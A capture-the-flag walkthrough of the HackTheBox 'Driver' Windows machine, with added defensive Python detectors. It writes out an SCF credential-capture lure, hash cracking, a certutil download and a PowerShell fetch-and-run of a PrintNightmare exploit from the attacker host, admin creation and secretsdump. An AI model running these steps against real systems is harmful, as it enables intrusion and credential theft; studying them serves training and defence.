Driver HackTheBox WalkThrough

This is a walkthrough of the Driver machine from HackTheBox. In this write-up I demonstrate step by step how I rooted the Driver HTB machine. Before starting, a few facts about the machine: it is a Windows box with IP address 10.10.11.106, and its maker has assigned it a difficulty of easy.
First of all, connect your PC to the HackTheBox VPN and confirm connectivity with the Driver machine by pinging its IP 10.10.11.106. If all goes well, it is time to start hacking. As usual, I started by scanning the machine. Scanning gives us an idea of how to proceed: it helps in banner grabbing the services running on the different ports, and sometimes it helps in vulnerability assessment as well. I have used $ nmap for this task and the result is given below:
Scanning
$ sudo nmap -p- --min-rate 10000 -oN nmap-alltcp.nmap 10.10.11.106

$ sudo nmap -p 80,135,445,5985 -sV -sC -oA nmap-tcpscripts 10.10.11.106

The full port scan with $ nmap revealed 4 open ports. A Microsoft IIS 10.0 web server is running on port 80. Since the web server version is 10.0, the current one, there is no known vulnerability in the web server software itself to pursue. Msrpc is running on port 135, the SMB service on port 445 and the Microsoft HTTPAPI service on port 5985. Since port 5985 is open, we can connect to the Driver machine remotely over this port once we obtain any user credential, because this port is used for Windows Remote Management (WinRM).
I began my enumeration with port 445. I tried to establish a null session on port 445 but got an ACCESS_DENIED message. Then, going to the URL http://10.10.11.106, I found a login page. I simply tried some default credentials like admin:admin and it worked; I logged in to the website successfully. It is a Firmware Update Center where users upload their firmware and the uploaded file is tested by the driver testing team. One thing is clear from this line: whatever file we upload to this site will be opened by the testing team.

But before going further, let us add driver.htb (pointing to 10.10.11.106) to our hosts file. The hosts file is present in the directory /etc/.
Hosts File After Modification
$ cat /etc/hosts

Going to the URL http://driver.htb/fw_up.php, I found a file upload function. Since the application is written in PHP, I tried to upload a PHP web shell, but it did not execute. I tried uploading files with other extensions such as aspx, exe, asp, etc., but none of them executed. I performed a directory brute force on http://driver.htb and found nothing useful. After some googling I found that we can perform an SCF File Attack when the SMB port is open and file shares are available. For more info about this attack, check this blog post at PentestLab. To perform the SCF File Attack, follow the given steps:
1. First, create a file with the following contents and save it with a name starting with @ (the @ symbol in front of the filename places share.scf at the top of the share listing) and the .scf file extension (don't forget to replace the IP address in the code below with your tun0 IP).
[Shell]
Command=2
IconFile=\\10.10.17.97\info.ico
[Taskbar]
Command=ToggleDesktop
$ cat @share.scf

2. Start $ responder to listen on your tun0 interface:
$ sudo responder -wrf --lm -v -I tun0

3. Finally, upload the @share.scf file at http://driver.htb/fw_up.php.

Since our uploaded file is opened by the driver user, when it opens @share.scf its machine tries to connect to the SMB share at IP 10.10.17.97 (my local IP) to fetch info.ico. As there is no file share at my local IP, $ responder answers the authentication request made by the driver user and poses as the SMB server the user is trying to reach. During authentication, responder captures the NTLMv2 challenge-response (commonly called the NTLMv2 hash) and dumps it on the screen. I followed all the above steps and got an NTLMv2 hash.
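As an added, defender-side example (not part of the original write-up), here is a check an upload handler could apply to catch the lure described above: it parses the INI-style SCF content and reports any [Shell] IconFile= value that points at a UNC path. The two sample files are constructed inline (the first is the lure from this post); the function and class names are my own.

```python
"""Flag uploaded files that behave like the SCF lure described above.

Added example, not from the original write-up.  A Shell Command File is a
small INI-style text file; the dangerous pattern is a [Shell] section whose
IconFile= points at a UNC path (\\host\share\...), because Explorer fetches
that icon over SMB as soon as the folder is rendered, sending the viewing
user's NTLM authentication to the host named in the path.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed samples: the lure from the write-up, and a harmless local icon reference.
SAMPLE_SCF = "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.17.97\\info.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"
BENIGN_SCF = "[Shell]\r\nCommand=2\r\nIconFile=C:\\Windows\\explorer.exe,3\r\n"

UNC_RE = re.compile(r"^\\\\([^\\]+)\\(.*)$")          # \\host\rest
SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")       # [Section]
KV_RE = re.compile(r"^\s*([^=\s]+)\s*=\s*(.*?)\s*$")   # Key=Value


@dataclass
class ScfFinding:
    section: str
    key: str
    unc_host: str
    unc_path: str


def parse_ini(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) triples; tolerant of CRLF and stray whitespace."""
    triples, section = [], ""
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1).lower()
            continue
        m = KV_RE.match(line)
        if m and section:
            triples.append((section, m.group(1).lower(), m.group(2)))
    return triples


def find_unc_references(text: str) -> List[ScfFinding]:
    """Report every key whose value is a UNC path; an SCF lure always has one."""
    findings = []
    for section, key, value in parse_ini(text):
        m = UNC_RE.match(value)
        if m:
            findings.append(ScfFinding(section, key, m.group(1), m.group(2)))
    return findings


def is_scf_lure(filename: str, text: str) -> bool:
    """True when the upload is an .scf whose [Shell] IconFile points at a remote host."""
    if not filename.lower().endswith(".scf"):
        return False
    return any(f.section == "shell" and f.key == "iconfile"
               for f in find_unc_references(text))


def suspicious_filename(filename: str) -> bool:
    """A leading '@' is the trick used above to pin the lure at the top of a listing."""
    return filename.startswith("@")


if __name__ == "__main__":
    for name, body in (("@share.scf", SAMPLE_SCF), ("icon.scf", BENIGN_SCF)):
        verdict = "lure" if is_scf_lure(name, body) else "clean"
        print(name, verdict, find_unc_references(body))
```

The check keys on the value rather than the filename: the .scf extension is what makes Explorer act on the file, while the leading @ is only cosmetic. The control that actually stops the credential leak is at the network layer, namely egress filtering of TCP 445 so that a viewing workstation cannot reach an outside SMB server at all.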

We can confirm the type of hash using the $ hashid tool.
Identifying the Hash
$ hashid 'tony::DRIVER:6a72987a59f37482:C126044A184E5D4B302403810B1657EB:01010000000000001F7189B530D3D7019194E00169BF593000000000020000000000000000000000'
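To show what that line actually contains, here is an added example (mine, not from the write-up or from any tool it mentions) that splits a NetNTLMv2 line in responder/john format into its fields and decodes the FILETIME timestamp carried in the blob. The input is the capture shown above; the blob on this page looks truncated after the first AV_PAIR header, so the parser decodes only the fixed-size part and keeps the remainder as raw bytes. Class and field names are my own.

```python
"""Break a captured NetNTLMv2 line into its fields.

Added example, not from the original write-up.  The line responder printed is
not a stored password hash but a challenge/response: the server challenge, the
16-byte NTProofStr (an HMAC-MD5 keyed with the user's NT hash) and the "blob"
the client signed.  The blob carries a FILETIME timestamp, which lets an
incident responder date the capture independently of any tool output.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Constructed from the line shown in the write-up (same string, responder format).
CAPTURED = ("tony::DRIVER:6a72987a59f37482:C126044A184E5D4B302403810B1657EB:"
            "01010000000000001F7189B530D3D7019194E00169BF5930"
            "00000000020000000000000000000000")

_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


@dataclass
class NetNtlmV2:
    user: str
    domain: str
    server_challenge: bytes
    nt_proof: bytes
    blob: bytes
    timestamp: datetime
    client_challenge: bytes
    av_pairs: bytes          # raw AV_PAIR area (truncated in the page's sample)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC."""
    return _FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_netntlmv2(line: str) -> NetNtlmV2:
    """Parse user::domain:server_challenge:ntproofstr:blob (responder/john format)."""
    user, _lm_field, domain, chal_hex, proof_hex, blob_hex = line.strip().split(":", 5)
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01" or len(blob) < 28:
        raise ValueError("not an NTLMv2 blob (missing 0x0101 response type)")
    # Blob layout: RespType(1) HiRespType(1) Reserved(6) TimeStamp(8)
    #              ClientChallenge(8) Reserved(4) AvPairs(...)
    ts = int.from_bytes(blob[8:16], "little")
    return NetNtlmV2(
        user=user,
        domain=domain,
        server_challenge=bytes.fromhex(chal_hex),
        nt_proof=bytes.fromhex(proof_hex),
        blob=blob,
        timestamp=filetime_to_datetime(ts),
        client_challenge=blob[16:24],
        av_pairs=blob[28:],
    )


if __name__ == "__main__":
    r = parse_netntlmv2(CAPTURED)
    print(r.user, r.domain, r.server_challenge.hex(), r.client_challenge.hex())
    print(r.timestamp.isoformat())   # 2021-11-06T17:06:58.829340+00:00
```

Decoding the fields makes two things plain: the server challenge and NTProofStr differ on every authentication, so the captured line is a one-off challenge/response rather than a reusable hash and can only be turned into a password by an offline dictionary attack; and the embedded timestamp tells an incident responder when the victim actually authenticated to the rogue share.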

Let us crack the hash using John the Ripper, an offline password cracker. You can also use another offline cracker such as $ hashcat.
Cracking Hash
A cheat sheet for John can be found at Pentestmonkey.
$ echo "tony::DRIVER:6a72987a59f37482:C126044A184E5D4B302403810B1657EB:01010000000000001F7189B530D3D7019194E00169BF593000000000020000000000000000000000" > hash.txt
$ john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
$ john --format=netntlmv2 --show hash.txt

The cracked password is liltony, so we have the credential tony:liltony. Since port 5985 is open, we can use evil-winrm to connect to the Driver machine remotely with this credential. Let us connect and get a user shell.
Getting User Shell
$ evil-winrm -u'tony' -p'liltony' -P5985 -i 10.10.11.106
$ whoami
$ hostname

We have successfully connected to the Driver machine. Let us capture the user flag.
Capture User Flag
$ type C:\Users\tony\Desktop\user.txt

Privilege Escalation
To escalate privileges to admin we first have to find a privilege escalation vector. We can use a post-exploitation enumeration script to find a PrivEsc vector. Check this link if you need more information about post-exploitation tools.
Finding PrivEsc Vector
I have used winPEAS this time. It is the best post-exploitation enumeration tool and can be found at this repo. Before we run winPEAS on the Driver machine we need to transfer it from our Kali machine. Follow the steps below to run winPEAS on the Driver machine.
On Kali Machine
$ wget https://github.com/carlospolop/PEASS-ng/raw/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases/winPEASx64.exe
$ python3 -m http.server 9001
On Driver Machine
$ cd C:\Temp\
$ certutil.exe -urlcache -split -f "http://10.10.17.97:9001/winPEASx64.exe" winPEASx64.exe
$ ./winPEASx64.exe

winPEAS found the spoolsv service running locally. For more info about this service, check this article.

Since the spoolsv service is related to printing and the name of this HTB box is Driver, this reminded me of the Windows Print Spooler Remote Code Execution Vulnerability, whose patch was released by Microsoft on 1 July 2021. The exploit is known as PrintNightmare and can be used to achieve remote code execution on Windows 10, Windows Server 2016 and almost all other Windows versions, which were vulnerable. Check the complete information about this vulnerability on the Microsoft site. A very good article on how to exploit this vulnerability was written by 0xdf; check that article by him.
When I tried to exploit this vulnerability, I easily got an admin shell. So our privilege escalation vector here is Privilege Escalation via Vulnerable Service Version.
Note: this exploit works only if the spoolsv service is running; otherwise it gives an error like “Failed to get current driver lists”. If you don't see the spoolsv service, you need to reset the machine. You can also use the command $ ps | findstr "spoolsv" to find the spoolsv service.

Performing Privilege Escalation
To perform privilege escalation and get an admin shell, follow the given steps.
On Kali Machine
$ git clone https://github.com/calebstewart/CVE-2021-1675
$ cd CVE-2021-1675/
$ echo "Invoke-Nightmare -NewUser 'newadmin' -NewPassword 'SuperSecurePassword'">>CVE-2021-1675.ps1
$ python3 -m http.server 9001
On Driver Machine
$ IEX(New-Object Net.WebClient).DownloadString("http://10.10.17.97:9001/CVE-2021-1675.ps1")

The above exploit adds a new user newadmin with password SuperSecurePassword and also adds this user to the local Administrators group. We can list all the accounts in the Administrators group with the following command.
$ net localgroup administrators
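As an added detection-side example (not from the write-up), the following correlates Windows Security events to catch after the fact exactly what that command reveals: a new local account that lands in the Administrators group moments after being created. The event records are constructed to mimic flattened Get-WinEvent output; event IDs 4720 and 4732 are the real ones, the timestamps and names are illustrative, and the function names are my own.

```python
"""Correlate Windows Security events to spot a freshly created local admin.

Added example, not from the original write-up.  The exploit step above ends
with a new account in the local Administrators group.  On the host that leaves
two Security-log events: 4720 (a user account was created) and 4732 (a member
was added to a security-enabled local group).  A 4732 into Administrators that
follows a 4720 for the same account within a short window is a strong
privilege-escalation signal regardless of who the subject is.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample events in the shape of Get-WinEvent output flattened to
# dicts (event id, time, relevant EventData fields).  The DRIVER$ subject is
# what you would see when a SYSTEM-level service performs the action.
EVENTS: List[Dict] = [
    {"EventID": 4624, "Time": "2021-11-06T17:20:01", "TargetUserName": "tony", "LogonType": "3"},
    {"EventID": 4720, "Time": "2021-11-06T17:31:10", "SubjectUserName": "DRIVER$",
     "TargetUserName": "newadmin"},
    {"EventID": 4732, "Time": "2021-11-06T17:31:11", "SubjectUserName": "DRIVER$",
     "TargetUserName": "Administrators", "MemberName": "DRIVER\\newadmin"},
    # Benign: an admin creates a normal user and adds it to a non-admin group.
    {"EventID": 4720, "Time": "2021-11-06T09:00:00", "SubjectUserName": "Administrator",
     "TargetUserName": "intern"},
    {"EventID": 4732, "Time": "2021-11-06T09:00:02", "SubjectUserName": "Administrator",
     "TargetUserName": "Remote Desktop Users", "MemberName": "DRIVER\\intern"},
]

ADMIN_GROUPS = {"administrators"}


@dataclass
class Alert:
    account: str
    created_at: datetime
    promoted_at: datetime
    subject: str


def _member_account(member: str) -> str:
    """'DRIVER\\newadmin' -> 'newadmin'.  A SID-only MemberName is returned unchanged."""
    return member.rsplit("\\", 1)[-1].lower()


def find_new_local_admins(events: List[Dict],
                          window: timedelta = timedelta(minutes=10)) -> List[Alert]:
    """Pair each 4732 into an admin group with a 4720 for the same account inside `window`."""
    created: Dict[str, Dict] = {}
    for ev in events:
        if ev["EventID"] == 4720:
            created[ev["TargetUserName"].lower()] = ev

    alerts = []
    for ev in events:
        if ev["EventID"] != 4732 or ev["TargetUserName"].lower() not in ADMIN_GROUPS:
            continue
        acct = _member_account(ev["MemberName"])
        creation = created.get(acct)
        if creation is None:
            continue                      # pre-existing account: a different rule's job
        t_create = datetime.fromisoformat(creation["Time"])
        t_add = datetime.fromisoformat(ev["Time"])
        if timedelta(0) <= t_add - t_create <= window:
            alerts.append(Alert(acct, t_create, t_add, ev["SubjectUserName"]))
    return alerts


if __name__ == "__main__":
    for a in find_new_local_admins(EVENTS):
        print(f"new local admin {a.account!r} created {a.created_at} by {a.subject}, "
              f"promoted at {a.promoted_at}")
```

Keying on the pair rather than on 4732 alone keeps routine group maintenance quiet while still firing on the pattern this privilege escalation produces; in a real deployment the events would come from an EVTX export or a SIEM query over the same two IDs.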

Getting Admin Shell
Since we have an admin credential, we can now access the SMB shares on port 445 and also have write permission on the C$ share of the Driver machine. Now we can use the psexec.py module of Impacket to get an admin shell. PsExec is a remote management tool, similar to SSH on Linux. Since port 5985 is open, we can also use $ evil-winrm with the credential newadmin:SuperSecurePassword to connect to the Driver machine.
$ impacket-psexec newadmin:SuperSecurePassword@10.10.11.106

We are NT AUTHORITY\SYSTEM now; let us grab the root flag.
Capture Root Flag
$ type C:\Users\Administrator\Desktop\root.txt

Dumping Admin Hash
$ impacket-secretsdump newadmin:SuperSecurePassword@10.10.11.106

This was how I rooted the Driver HackTheBox machine. I learnt a lot from solving this box and hope you have also learnt something new. Thanks for reading this walkthrough. For any query or suggestion about the walkthrough, feel free to write to us at [email protected].